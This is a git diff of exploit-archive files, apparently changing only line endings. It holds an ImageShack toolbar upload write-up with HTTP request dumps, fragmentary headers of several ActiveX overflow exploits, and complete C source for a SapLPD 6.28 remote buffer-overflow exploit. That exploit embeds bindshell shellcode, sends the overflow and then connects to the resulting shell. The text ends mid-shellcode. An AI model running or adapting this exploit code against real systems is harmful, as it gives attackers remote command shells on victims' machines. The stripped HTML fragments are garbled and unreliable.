src="http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.th.jpg" alt="Free Image Hosting at www.ImageShack.us" border="0"/></a> - [URL=http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg][IMG]http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.th.jpg[/IMG][/URL] - [url=http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg][img=http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.th.jpg][/url] - http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg - http://img262.imageshack.us/content.php?page=done&l=img262/7959/xpwallpaperglasstq2.jpg - - - -with the boot.ini file: - -POST /upload_api.php HTTP/1.1 -Content-Type: multipart/form-data, boundary=B-O-U-N-D-A-R-Y732118720442 -Content-Length: 1077 -User-Agent: ImageShack Toolbar 4.5.7 (WinNT 5.1 Service Pack 2) -Host: load10.imageshack.us -Connection: Keep-Alive -Cache-Control: no-cache -Cookie: imgshck=[..]; un_cookie=1; latest=img214; flashInstalled=9.0; __qca=[..]; rem_bar=1; nopopunder=1; always_opt=-1 - ---B-O-U-N-D-A-R-Y732118720442 -Content-Disposition: form-data; name="toolbar" - 
-IEImageShackToolbar-4.5.7.69 ---B-O-U-N-D-A-R-Y732118720442 -Content-Disposition: form-data; name="public" - -yes ---B-O-U-N-D-A-R-Y732118720442 -Content-Disposition: form-data; name="xml" - -newformat ---B-O-U-N-D-A-R-Y732118720442 -Content-Disposition: form-data; name="tags" - -uhuhinterestingprivatethings ---B-O-U-N-D-A-R-Y732118720442 -Content-Disposition: form-data; name="rembar" - -1 ---B-O-U-N-D-A-R-Y732118720442 -Content-Disposition: form-data; name="fileupload"; filename="boot.ini" -Content-Type: application/octet-stream -Content-Transfer-Encoding: binary - -[boot loader] -timeout=30 -default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS -[operating systems] -multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Home Edition" / fastdetect /NoExecute=OptIn ---B-O-U-N-D-A-R-Y732118720442 -Content-Disposition: form-data; name="class" - -s ---B-O-U-N-D-A-R-Y732118720442-- - -reply: - -HTTP/1.1 200 OK -Transfer-Encoding: chunked -X-Powered-By: PHP/5.1.2 -Content-Type: text/xml -Set-Cookie: latest=img89; expires=Sun, 18-Jan-2009 07:56:28 GMT; path=/; domain=.imageshack.us -Date: Thu, 24 Jan 2008 07:56:28 GMT -Server: lighttpd/1.4.18 - - -Wrong file type detected for file boot.ini:application/octet-stream - - -# milw0rm.com [2008-01-24] + + + + + + + + + +---- + +some wireshark's dump samples: + +POST /upload_api.php HTTP/1.1 +Content-Type: multipart/form-data, boundary=B-O-U-N-D-A-R-Y731553141 +Content-Length: 21755 +User-Agent: ImageShack Toolbar 4.5.7 ([..]) +Host: load9.imageshack.us +Connection: Keep-Alive +Cache-Control: no-cache +Cookie: imgshck=[..]; un_cookie=1; latest=img404; flashInstalled=9.0; __qca=[..]; rem_bar=1; nopopunder=1 + +--B-O-U-N-D-A-R-Y731553141 +Content-Disposition: form-data; name="toolbar" + +IEImageShackToolbar-4.5.7.69 +--B-O-U-N-D-A-R-Y731553141 +Content-Disposition: form-data; name="public" + +yes +--B-O-U-N-D-A-R-Y731553141 +Content-Disposition: form-data; name="xml" + +newformat +--B-O-U-N-D-A-R-Y731553141 
+Content-Disposition: form-data; name="tags" + +uhuhinterestingprivatethings +--B-O-U-N-D-A-R-Y731553141 +Content-Disposition: form-data; name="rembar" + +1 +--B-O-U-N-D-A-R-Y731553141 +Content-Disposition: form-data; name="fileupload"; filename="xp_wallpaper_glass.jpg" +Content-Type: image/jpeg +Content-Transfer-Encoding: binary + +[file content] +--B-O-U-N-D-A-R-Y731553141 +Content-Disposition: form-data; name="thumbupload"; filename="xp_wallpaper_glass6fa1f1.jpg" +Content-Type: image/jpeg +Content-Transfer-Encoding: binary + +[file content] +--B-O-U-N-D-A-R-Y731553141 +Content-Disposition: form-data; name="class" + +s +--B-O-U-N-D-A-R-Y731553141-- + + +reply: + +HTTP/1.1 200 OK +Connection: close +Transfer-Encoding: chunked +X-Powered-By: PHP/5.1.2 +Set-Cookie: latest=img262; expires=Sun, 18-Jan-2009 07:56:24 GMT; path=/; domain=.imageshack.us +Set-Cookie: PHPSESSID=[..]; path=/ +Set-Cookie: always_opt=-1; path=/; domain=.imageshack.us +Set-Cookie: rem_bar=1; expires=Sun, 18-Jan-2009 07:56:24 GMT; path=/; domain=.imageshack.us +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Content-type: text/xml +Pragma: public +Cache-Control: must-revalidate, post-check=0, pre-check=0 +Date: Thu, 24 Jan 2008 07:56:25 GMT +Server: lighttpd/1.4.8 + + + + 0 + 0.0 + + + xpwallpaperglasstq2.jpg + xpwallpaperglasstq2.th.jpg + + + 426 + 320 + + s + + 87.11.97.155 + + + http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.jpg + <a href="http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg" target="_blank"><img src="http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.jpg" alt="Free Image Hosting at www.ImageShack.us" border="0"/></a> + [URL=http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg][IMG]http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.jpg[/IMG][/URL] + [url=http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg][img=http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.jpg][/url] + 
http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.th.jpg + <a href="http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg" target="_blank"><img src="http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.th.jpg" alt="Free Image Hosting at www.ImageShack.us" border="0"/></a> + [URL=http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg][IMG]http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.th.jpg[/IMG][/URL] + [url=http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg][img=http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.th.jpg][/url] + http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg + http://img262.imageshack.us/content.php?page=done&l=img262/7959/xpwallpaperglasstq2.jpg + + + +with the boot.ini file: + +POST /upload_api.php HTTP/1.1 +Content-Type: multipart/form-data, boundary=B-O-U-N-D-A-R-Y732118720442 +Content-Length: 1077 +User-Agent: ImageShack Toolbar 4.5.7 (WinNT 5.1 Service Pack 2) +Host: load10.imageshack.us +Connection: Keep-Alive +Cache-Control: no-cache +Cookie: imgshck=[..]; un_cookie=1; latest=img214; flashInstalled=9.0; __qca=[..]; rem_bar=1; nopopunder=1; always_opt=-1 + +--B-O-U-N-D-A-R-Y732118720442 +Content-Disposition: form-data; name="toolbar" + +IEImageShackToolbar-4.5.7.69 +--B-O-U-N-D-A-R-Y732118720442 +Content-Disposition: form-data; name="public" + +yes +--B-O-U-N-D-A-R-Y732118720442 +Content-Disposition: form-data; name="xml" + +newformat +--B-O-U-N-D-A-R-Y732118720442 +Content-Disposition: form-data; name="tags" + +uhuhinterestingprivatethings +--B-O-U-N-D-A-R-Y732118720442 +Content-Disposition: form-data; name="rembar" + +1 +--B-O-U-N-D-A-R-Y732118720442 +Content-Disposition: form-data; name="fileupload"; filename="boot.ini" +Content-Type: application/octet-stream +Content-Transfer-Encoding: binary + +[boot loader] +timeout=30 +default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS +[operating systems] 
+multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Home Edition" / fastdetect /NoExecute=OptIn +--B-O-U-N-D-A-R-Y732118720442 +Content-Disposition: form-data; name="class" + +s +--B-O-U-N-D-A-R-Y732118720442-- + +reply: + +HTTP/1.1 200 OK +Transfer-Encoding: chunked +X-Powered-By: PHP/5.1.2 +Content-Type: text/xml +Set-Cookie: latest=img89; expires=Sun, 18-Jan-2009 07:56:28 GMT; path=/; domain=.imageshack.us +Date: Thu, 24 Jan 2008 07:56:28 GMT +Server: lighttpd/1.4.18 + + +Wrong file type detected for file boot.ini:application/octet-stream + + +# milw0rm.com [2008-01-24] diff --git a/platforms/windows/remote/4982.html b/platforms/windows/remote/4982.html index 7587d9da2..23764d09e 100755 --- a/platforms/windows/remote/4982.html +++ b/platforms/windows/remote/4982.html @@ -1,120 +1,120 @@ - - - - Gateway WebLaunch Buffer Overflow Exploit - - - - - Unable to create object - - - - -# milw0rm.com [2008-01-25] + + + + Gateway WebLaunch Buffer Overflow Exploit + + + + + Unable to create object + + + + +# milw0rm.com [2008-01-25] diff --git a/platforms/windows/remote/4986.html b/platforms/windows/remote/4986.html index ce987c6eb..55bd11e10 100755 --- a/platforms/windows/remote/4986.html +++ b/platforms/windows/remote/4986.html @@ -1,35 +1,35 @@ - - - - - - - - - Namo Web Editor NamoInstaller.dll install Method Exploit - - - - - Unable to create object - - - - -tml> - ---> - -# milw0rm.com [2008-01-25] + + + + + + + + + Namo Web Editor NamoInstaller.dll install Method Exploit + + + + + Unable to create object + + + + +tml> + +--> + +# milw0rm.com [2008-01-25] diff --git a/platforms/windows/remote/4987.html b/platforms/windows/remote/4987.html index 52689f115..d5b8864eb 100755 --- a/platforms/windows/remote/4987.html +++ b/platforms/windows/remote/4987.html 
@@ -1,118 +1,118 @@ - - - - Persits XUpload 3.0 AddFile() Buffer Overflow Exploit - - - - - Unable to create object - - - - -# milw0rm.com [2008-01-25] + + + + Persits XUpload 3.0 AddFile() Buffer Overflow Exploit + + + + + Unable to create object + + + + +# milw0rm.com [2008-01-25] diff --git a/platforms/windows/remote/4999.htm b/platforms/windows/remote/4999.htm index 831459d08..0a41fde06 100755 --- a/platforms/windows/remote/4999.htm +++ b/platforms/windows/remote/4999.htm @@ -1,33 +1,33 @@ - - -
    - -
    =======================================================================
    -
    - MailBee Objects v5.5 (MailBee.dll) Insecure Method
    - Web site : http://www.afterlogic.com/

    -======================================================================= -
    Author: darkl0rd -
    E-mail: l_l_darkl0rd_l_l@yahoo.com

    - Tested on Windows XP Professional SP2 , with Internet Explorer 6 -
    - -
    - -

    Save Files -
     
    Creat Files
    -
    -d'/ -
    - -# milw0rm.com [2008-01-28] + + +
    + +
    =======================================================================
    +
    + MailBee Objects v5.5 (MailBee.dll) Insecure Method
    + Web site : http://www.afterlogic.com/

    +======================================================================= +
    Author: darkl0rd +
    E-mail: l_l_darkl0rd_l_l@yahoo.com

    + Tested on Windows XP Professional SP2 , with Internet Explorer 6 +
    + +
    + +

    Save Files +
     
    Creat Files
    +
    +d'/ +
    + +# milw0rm.com [2008-01-28] diff --git a/platforms/windows/remote/5005.html b/platforms/windows/remote/5005.html index 85543c91d..1541b9175 100755 --- a/platforms/windows/remote/5005.html +++ b/platforms/windows/remote/5005.html @@ -1,33 +1,33 @@ - - -

    Chilkat Mail -ActiveX 7.8 (ChilkatCert.dll) Insecure Method Exploit

    -

    Site : -www.chilkatsoft.com

    -

    -===================================================

    -

    Tested on -Windows XP Professional SP2 , with Internet Explorer 6

    -

    Author : -darkl0rd

    -

    E-Mail : -l_l_darkl0rd_l_l[at]yahoo[dot]com

    -

    SaveLastError

    -

    - - - - - - - -

    - - -# milw0rm.com [2008-01-29] + + +

    Chilkat Mail +ActiveX 7.8 (ChilkatCert.dll) Insecure Method Exploit

    +

    Site : +www.chilkatsoft.com

    +

    +===================================================

    +

    Tested on +Windows XP Professional SP2 , with Internet Explorer 6

    +

    Author : +darkl0rd

    +

    E-Mail : +l_l_darkl0rd_l_l[at]yahoo[dot]com

    +

    SaveLastError

    +

    + + + + + + + +

    + + +# milw0rm.com [2008-01-29] diff --git a/platforms/windows/remote/5025.html b/platforms/windows/remote/5025.html index cd137fa37..979f6c837 100755 --- a/platforms/windows/remote/5025.html +++ b/platforms/windows/remote/5025.html @@ -1,119 +1,119 @@ - - - - MySpace Uploader Buffer Overflow Exploit - - - - - Unable to create object - - - - -# milw0rm.com [2008-01-31] + + + + MySpace Uploader Buffer Overflow Exploit + + + + + Unable to create object + + + + +# milw0rm.com [2008-01-31] diff --git a/platforms/windows/remote/5028.html b/platforms/windows/remote/5028.html index 21d72c8dc..dfe49cf7c 100755 --- a/platforms/windows/remote/5028.html +++ b/platforms/windows/remote/5028.html @@ -1,24 +1,24 @@ - - -
    - -
    =======================================================================
    -
    -

    Chilkat FTP ActiveX 2.0 (ChilkatCert.dll) Insecure Method

    Web site : www.chilkatsoft.com


    =======================================================================

    Author: darkl0rd

    E-mail: l_l_darkl0rd_l_l@yahoo.com


    Tested on Windows XP Professional SP2 , with Internet Explorer 6

    Class privateKey
    GUID: {A934AEE3-8896-485F-8A55-ACF2A87BD010}
    Number of Interfaces: 1
    Default Interface: IPrivateKey

    SavePkcs8File

    - -
    - - - - - -

    - - -# milw0rm.com [2008-01-31] + + +
    + +
    =======================================================================
    +
    +

    Chilkat FTP ActiveX 2.0 (ChilkatCert.dll) Insecure Method

    Web site : www.chilkatsoft.com


    =======================================================================

    Author: darkl0rd

    E-mail: l_l_darkl0rd_l_l@yahoo.com


    Tested on Windows XP Professional SP2 , with Internet Explorer 6

    Class privateKey
    GUID: {A934AEE3-8896-485F-8A55-ACF2A87BD010}
    Number of Interfaces: 1
    Default Interface: IPrivateKey

    SavePkcs8File

    + +
    + + + + + +

    + + +# milw0rm.com [2008-01-31] diff --git a/platforms/windows/remote/5045.html b/platforms/windows/remote/5045.html index 8f3eb1d30..40bbe69e9 100755 --- a/platforms/windows/remote/5045.html +++ b/platforms/windows/remote/5045.html @@ -1,37 +1,37 @@ - - - - - - - - - -# milw0rm.com [2008-02-03] + + + + + + + + + +# milw0rm.com [2008-02-03] diff --git a/platforms/windows/remote/5046.php b/platforms/windows/remote/5046.php index 8ef7fc5a6..514604076 100755 --- a/platforms/windows/remote/5046.php +++ b/platforms/windows/remote/5046.php @@ -1,87 +1,87 @@ - - - - function unescape($s){ - $res=strtoupper(bin2hex($s)); - $g = round(strlen($res)/4); - if ($g != (strlen($res)/4))$res.="00"; - $out = ""; - for ($i=0; $i - - - - - - '; - -?> - -# milw0rm.com [2008-02-03] + + + + function unescape($s){ + $res=strtoupper(bin2hex($s)); + $g = round(strlen($res)/4); + if ($g != (strlen($res)/4))$res.="00"; + $out = ""; + for ($i=0; $i + + + + + + '; + +?> + +# milw0rm.com [2008-02-03] diff --git a/platforms/windows/remote/5048.html b/platforms/windows/remote/5048.html index 208dd8c64..40cc4a0e6 100755 --- a/platforms/windows/remote/5048.html +++ b/platforms/windows/remote/5048.html @@ -1,60 +1,60 @@ - - - - - - - - -# milw0rm.com [2008-02-03] + + + + + + + + +# milw0rm.com [2008-02-03] diff --git a/platforms/windows/remote/5049.html b/platforms/windows/remote/5049.html index e711d0e29..65e38d73c 100755 --- a/platforms/windows/remote/5049.html +++ b/platforms/windows/remote/5049.html @@ -1,132 +1,132 @@ - - - - FaceBook PhotoUploader Buffer Overflow Exploit - - - - - Unable to create object - - - - -# milw0rm.com [2008-02-03] + + + + FaceBook PhotoUploader Buffer Overflow Exploit + + + + + Unable to create object + + + + +# milw0rm.com [2008-02-03] diff --git a/platforms/windows/remote/5051.html b/platforms/windows/remote/5051.html index e23e05c6d..dc366a6b7 100755 --- a/platforms/windows/remote/5051.html +++ b/platforms/windows/remote/5051.html 
@@ -1,121 +1,121 @@ - - - - Yahoo! JukeBox datagrid.dll AddButton() Buffer Overflow Exploit - - - - - Unable to create object - - - - -# milw0rm.com [2008-02-03] + + + + Yahoo! JukeBox datagrid.dll AddButton() Buffer Overflow Exploit + + + + + Unable to create object + + + + +# milw0rm.com [2008-02-03] diff --git a/platforms/windows/remote/5052.html b/platforms/windows/remote/5052.html index d1520b0fd..cedc9923f 100755 --- a/platforms/windows/remote/5052.html +++ b/platforms/windows/remote/5052.html @@ -1,119 +1,119 @@ - - - - Yahoo! JukeBox MediaGrid ActiveX Control mediagrid.dll AddBitmap() Buffer Overflow Exploit - - - - - Unable to create object - - - - -# milw0rm.com [2008-02-03] + + + + Yahoo! JukeBox MediaGrid ActiveX Control mediagrid.dll AddBitmap() Buffer Overflow Exploit + + + + + Unable to create object + + + + +# milw0rm.com [2008-02-03] diff --git a/platforms/windows/remote/5078.htm b/platforms/windows/remote/5078.htm index f4ee49bd5..70b3cc29b 100755 --- a/platforms/windows/remote/5078.htm +++ b/platforms/windows/remote/5078.htm @@ -1,19 +1,19 @@ - - - File Upload POC - -

    Backup Exec System Recovery Manager 7.0
    File Upload POC

    -
    - Remote Path:
    - File to upload:
    -
    -

    -
    -(c)BastardLabs 2008. - - - -# milw0rm.com [2008-02-07] + + + File Upload POC + +

    Backup Exec System Recovery Manager 7.0
    File Upload POC

    +
    + Remote Path:
    + File to upload:
    +
    +

    +
    +(c)BastardLabs 2008. + + + +# milw0rm.com [2008-02-07] diff --git a/platforms/windows/remote/5079.c b/platforms/windows/remote/5079.c index dbb35d887..563ca440e 100755 --- a/platforms/windows/remote/5079.c +++ b/platforms/windows/remote/5079.c 
@@ -1,357 +1,357 @@ -/* - http://lists.grok.org.uk/pipermail/full-disclosure/2008-February/060042.html - - Exploit for SapLPD 6.28 Win32 by BackBone - Tested with SapLPD 6.28 on Windows XP SP2 - - Groetjes aan mijn sletjes Ops,Doop,Gabber,head,ps,sj,dd en de rest! -*/ - -#include -#include -#include -#pragma comment (lib,"ws2_32") - -#define DEFAULT_PORT 515 - -char ASCII_SHIT[]= -"\r\n" -"\t\t ______ ______\r\n" -"\t\t (, / ) /) (, / )\r\n" -"\t\t /---( _ _ (/_ /---( _____ _\r\n" -"\t\t ) / ____)(_(_(__/(__) / ____)(_) / (__(/_\r\n" -"\t\t(_/ ( (_/ ( (c) 2008\r\n" -"\r\n"; - -struct -{ - LPSTR lpVersion; - DWORD dwOffset; - DWORD dwRetAddr; - BYTE bLPDCmd; -} -targets[]= -{ - // exploit works with cmd 0x01,0x02,0x03,... - {"SAPLPD Version 6.28 for Windows/NT (TEST)",484,0x0012F0A1,0x01}, // addr of shellcode -> 0x0012F0A1 - {"SAPLPD Version 6.28 for Windows/NT",484,0x004E0BB7,0x01}, // jmp esp 0x004E0BB7 -> SAPLpd.exe 6.28 -},v; - - -// don't change the offset -#define PORT_OFFSET 170 -#define BIND_PORT 10282 - -// bindshell shellcode from www.metasploit.com,mod by skylined -unsigned char shellcode[] = - "\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x52\x8b\x52" - "\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\xee\x31\xff\xc1" - "\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\xea\x5a\x8b\x5a" - "\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01" - "\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b" - "\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32" - "\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\xfe\xe8\x90\xff" - "\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x54\x31\xc0\xfe" - "\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\xff\x31\xc0\x50" - "\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\xe8\x61\xff\xff" - "\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\xfe\xcc\x50\x89" - "\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x42\xff\xff\xff" - 
"\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\xff\xff\x58\x60" - "\x6a\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x23\xff\xff\xff\x89" - "\xc6\x31\xdb\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x31\xdb\x56\x56" - "\x56\x53\x53\x31\xc0\xfe\xc4\x40\x50\x53\x53\x53\x53\x53\x53\x53" - "\x53\x53\x53\x6a\x44\x89\xe0\x53\x53\x53\x53\x54\x50\x53\x53\x53" - "\x43\x53\x4b\x53\x53\x51\x53\x87\xfd\xbb\x21\xd0\x05\xd0\xe8\xdf" - "\xfe\xff\xff\x5b\x31\xc0\x48\x50\x53\xbb\x43\xcb\x8d\x5f\xe8\xcf" - "\xfe\xff\xff\x56\x87\xef\xbb\x12\x6b\x6d\xd0\xe8\xc2\xfe\xff\xff" - "\x83\xc4\x5c\x61\xeb\x89"; - -#define SET_BIND_PORT(p) *(USHORT*)(shellcode+PORT_OFFSET)=htons(p); - -BOOL StartupWinsock(void) -{ - WSADATA wsa; - - return !WSAStartup(MAKEWORD(2,0),&wsa); -} - -DWORD LookupAddress(LPSTR lpHost) -{ - DWORD dwRemoteAddr=inet_addr(lpHost); - - if (dwRemoteAddr==INADDR_NONE) - { - struct hostent* pHostEnt=gethostbyname(lpHost); - if (pHostEnt==0) - return INADDR_NONE; - dwRemoteAddr = *((DWORD*)pHostEnt->h_addr_list[0]); - } - - return dwRemoteAddr; -} - -SOCKET TCPConnect(DWORD dwIP,WORD wPort,DWORD dwTimeout) -{ - struct sockaddr_in sock_in; - struct timeval timeout; - DWORD fdWrite[2]; - DWORD fdExcept[2]; - SOCKET s; - int slResult; - int val=1,len=sizeof(int); - - s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); - if (s==INVALID_SOCKET) - return SOCKET_ERROR; - - ioctlsocket(s,FIONBIO,(u_long*)&val); - - fdWrite[0]=fdExcept[0]=1; - fdWrite[1]=fdExcept[1]=s; - - memset(&sock_in,0,sizeof(sock_in)); - sock_in.sin_port=wPort; - sock_in.sin_family=AF_INET; - sock_in.sin_addr.s_addr=dwIP; - - connect(s,(struct sockaddr*)&sock_in,sizeof(sock_in)); - - timeout.tv_sec=dwTimeout/1000; - timeout.tv_usec=dwTimeout%1000; - - slResult=select(0,NULL,(fd_set*)&fdWrite,(fd_set*)&fdExcept,&timeout); - switch(slResult) - { - case -1: - case 0: - { - closesocket(s); - return SOCKET_ERROR; - } - - default: - { - if (!FD_ISSET(s,(fd_set*)&fdExcept)) - { - val=0;ioctlsocket(s,FIONBIO,(u_long*)&val); - return s; - } 
- break; - } - } - - closesocket(s); - return SOCKET_ERROR; -} - -/* ripped from TESO code and modifed by ey4s for win32 */ -void Shell(int s) -{ - int l; - char buf[512]; - struct timeval time; - unsigned long ul[2]; - - time.tv_sec=1; - time.tv_usec=0; - - while(1) - { - ul[0]=1; - ul[1]=s; - - l=select(0,(fd_set*)&ul,NULL,NULL,&time); - if(l==1) - { - l=recv(s,buf,sizeof(buf),0); - if (l<=0) - { - printf("\r\n[-] connection closed.\n"); - return; - } - l=write(1,buf,l); - if (l<=0) - { - printf("\r\n[-] connection closed.\n"); - return; - } - } - else - { - l=read(0,buf,sizeof(buf)); - if (l<=0) - { - printf("\r\n[-] connection closed.\n"); - return; - } - l=send(s,buf,l,0); - if (l<=0) - { - printf("\r\n[-] connection closed.\n"); - return; - } - } - } -} - -void ShowBanner(void) -{ - printf("%s",ASCII_SHIT); -} - -void ShowSploit(void) -{ - printf("\t\tSAPlpd 6.28 Multiple Remote Buffer Overflows\r\n"); - printf("\t\t Advisory by Luigi Auriemma\r\n"); - printf("\t\t Exploit By BackBone\r\n"); - printf("\r\n"); -} - -void ShowUsage(char* argv) -{ - int i; - - printf("[*] %s host/ip[:port] target [bindport]\r\n",argv); - printf("[*] Default port: %d - Default bindport: %d\r\n",DEFAULT_PORT,BIND_PORT); - printf("[*] Target(s):\r\n\r\n"); - for (i=0;i<(sizeof(targets)/sizeof(v));i++) - printf("\t%2d: %s (0x%08x)\r\n",i,targets[i].lpVersion,targets[i].dwRetAddr); -} - -int main(int argc, char* argv[]) -{ - LPSTR lpHost,lpPort; - ULONG ulIP; - USHORT usPort; - USHORT usBindPort; - SOCKET sSock; - int iTarget; - int iLen=0; - char lpBuffer[16384]; - - ShowBanner(); - ShowSploit(); - - // check arguments - if (argc<3||argc>4) - { - ShowUsage(argv[0]); - return -1; - } - - // get host/ip - lpHost=strtok(argv[1],":"); - // get port - lpPort=strtok(NULL,":"); - if (lpPort) usPort=(USHORT)atoi(lpPort); - else usPort=DEFAULT_PORT; - - // startup winsock - if (!StartupWinsock()) - { - printf("[-] WSAStartup() Failed.\r\n"); - return -1; - } - - // resolve host - 
ulIP=LookupAddress(lpHost); - if (ulIP==INADDR_NONE) - { - printf("[-] Invalid IP/Host.\r\n"); - WSACleanup(); - return -1; - } - - // get target - iTarget=atoi(argv[2]); - if (iTarget<0||iTarget>(sizeof(targets)/sizeof(v))-1) - { - printf("[-] Invalid target.\r\n"); - WSACleanup(); - return -1; - } - - printf("[+] Target: %s (0x%08x)\r\n",targets[iTarget].lpVersion,targets[iTarget].dwRetAddr); - - if (argc==4) usBindPort=(USHORT)atoi(argv[3]); - else usBindPort=BIND_PORT; - SET_BIND_PORT(usBindPort); - - // connecting - printf("[+] Connecting to %d.%d.%d.%d:%d ... ",ulIP&0xFF,(ulIP>>8)&0xFF, - (ulIP>>16)&0xFF,(ulIP>>24)&0xFF,usPort); - - // connect - sSock=TCPConnect(ulIP,htons(usPort),10000); - if (sSock==SOCKET_ERROR) - { - printf("Failed!\r\n"); - WSACleanup(); - return -1; - } - - printf("Ok.\r\n"); - - // construct buffer - memset(lpBuffer,0,sizeof(lpBuffer)); - - *lpBuffer=targets[iTarget].bLPDCmd; - iLen+=1; - - memset(lpBuffer+iLen,0x90,targets[iTarget].dwOffset-sizeof(shellcode)); - iLen+=targets[iTarget].dwOffset-sizeof(shellcode); - - memcpy(lpBuffer+iLen,shellcode,sizeof(shellcode)); - iLen+=sizeof(shellcode); - - memcpy(lpBuffer+iLen,&targets[iTarget].dwRetAddr,4); - iLen+=4; - - memcpy(lpBuffer+iLen,"\xE9\x98\x08\x00\x00",5); // jmp esp will execute this code, jmp to shellcode - iLen+=5; - - memset(lpBuffer+iLen,0x41,1);// saplpd zeroes this byte - iLen+=1; - - printf("[+] Sending buffer (size:%d) ... ",iLen); - - // send buffer - if (send(sSock,lpBuffer,iLen,0)<=0) - { - printf("Failed!\r\n"); - WSACleanup(); - return -1; - } - - printf("Ok.\r\n"); - - closesocket(sSock); - - Sleep(1000); - - // connecting - printf("[+] Connecting to %d.%d.%d.%d:%d ... 
",ulIP&0xFF,(ulIP>>8)&0xFF, - (ulIP>>16)&0xFF,(ulIP>>24)&0xFF,usBindPort); - - // connect to bindshell - sSock=TCPConnect(ulIP,htons(usBindPort),10000); - if (sSock==SOCKET_ERROR) - { - printf("Failed!\r\n"); - WSACleanup(); - return -1; - } - - printf("Ok.\r\n\r\n"); - - // shell - Shell(sSock); - - closesocket(sSock); - - WSACleanup(); - - return 0; -} - -// milw0rm.com [2008-02-07] +/* + http://lists.grok.org.uk/pipermail/full-disclosure/2008-February/060042.html + + Exploit for SapLPD 6.28 Win32 by BackBone + Tested with SapLPD 6.28 on Windows XP SP2 + + Groetjes aan mijn sletjes Ops,Doop,Gabber,head,ps,sj,dd en de rest! +*/ + +#include +#include +#include +#pragma comment (lib,"ws2_32") + +#define DEFAULT_PORT 515 + +char ASCII_SHIT[]= +"\r\n" +"\t\t ______ ______\r\n" +"\t\t (, / ) /) (, / )\r\n" +"\t\t /---( _ _ (/_ /---( _____ _\r\n" +"\t\t ) / ____)(_(_(__/(__) / ____)(_) / (__(/_\r\n" +"\t\t(_/ ( (_/ ( (c) 2008\r\n" +"\r\n"; + +struct +{ + LPSTR lpVersion; + DWORD dwOffset; + DWORD dwRetAddr; + BYTE bLPDCmd; +} +targets[]= +{ + // exploit works with cmd 0x01,0x02,0x03,... 
+ {"SAPLPD Version 6.28 for Windows/NT (TEST)",484,0x0012F0A1,0x01}, // addr of shellcode -> 0x0012F0A1
+ {"SAPLPD Version 6.28 for Windows/NT",484,0x004E0BB7,0x01}, // jmp esp 0x004E0BB7 -> SAPLpd.exe 6.28
+},v;
+
+
+// don't change the offset
+#define PORT_OFFSET 170
+#define BIND_PORT 10282
+
+// bindshell shellcode from www.metasploit.com,mod by skylined
+unsigned char shellcode[] =
+ "\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x52\x8b\x52"
+ "\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\xee\x31\xff\xc1"
+ "\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\xea\x5a\x8b\x5a"
+ "\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
+ "\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b"
+ "\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32"
+ "\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\xfe\xe8\x90\xff"
+ "\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x54\x31\xc0\xfe"
+ "\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\xff\x31\xc0\x50"
+ "\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\xe8\x61\xff\xff"
+ "\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\xfe\xcc\x50\x89"
